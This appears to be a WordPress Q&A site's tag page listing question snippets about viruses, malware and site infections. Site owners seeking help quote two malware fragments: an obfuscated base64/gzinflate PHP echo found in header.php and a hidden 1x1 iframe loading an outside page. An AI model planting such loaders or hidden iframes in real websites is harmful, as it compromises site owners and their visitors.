in WordPress virus is malicious code (PHP, Java Script, etc) that can self replicate, do damage, and steal sensitive information. usually it comes in disguise as plugin or theme.

learn more… | top users | synonyms

1
vote
1answer
102 views

Best Way to Upgrade from WP 2.8 (!)?

I offered a friend to help translate from English some parts of his (mostly) Hebrew install. Then he told me two things: 1) That he's running 2.8 (he was worried about updating because he didn't ...
1
vote
1answer
21 views

Advice and plugins against Malware [closed]

I´m starting with WordPress and would like to make sure my blog stays Malware free. I´ve seen that there are quite a few things to do to insure that. Personnally I´d like to keep it easy and still be ...
0
votes
1answer
71 views

Unable to access WP admin

I cannot access admin via: http://xxxxxx.com/admin or http://xxxxxx.com/wp-admin Fatal error: Class 'ObjectModel' not found in ...
0
votes
1answer
160 views

Javascript alert appears before <!DOCTYPE> tag

I have wordpress 3.5.1 on Debian Squeeze. Every time before the page loads javascript alert appears with message 2819371938193817109948281937271937 and have to click OK to see the page. I get this ...
0
votes
1answer
516 views

Malware in header.php [closed]

Four different websites got infected and been blocked by Google, and after a quick look, I've noticed this just before wp_head(): <?php #d93065# echo(gzinflate(base64_decode("tVVNj5swEP0... ...
0
votes
4answers
260 views

Malicious script is being appended to my markup. Help? [closed]

On my site, the script below is being added: <iframe width="1" height="1" frameborder="0" src="http://hysofufewobe.com/k985ytv.htm"> I tried searching every file in my WP install directory ...
1
vote
3answers
107 views

Can a user spread virus on my Multisite?

Can a user spread Virus or do an harm to Multisite Installation ? Can a user take a chance of using "HTML " option in posts? In what ways do my Multi-site have chances to get attacked ? Could you ...
2
votes
2answers
1k views

Can a WordPress plugin or theme contain a virus?

Is it possible to write a virus in a form of a WordPress plugin/theme? Is it possible to: steal user data? damage existing WordPress installation? (optionally) self-spread the virus? Are there ...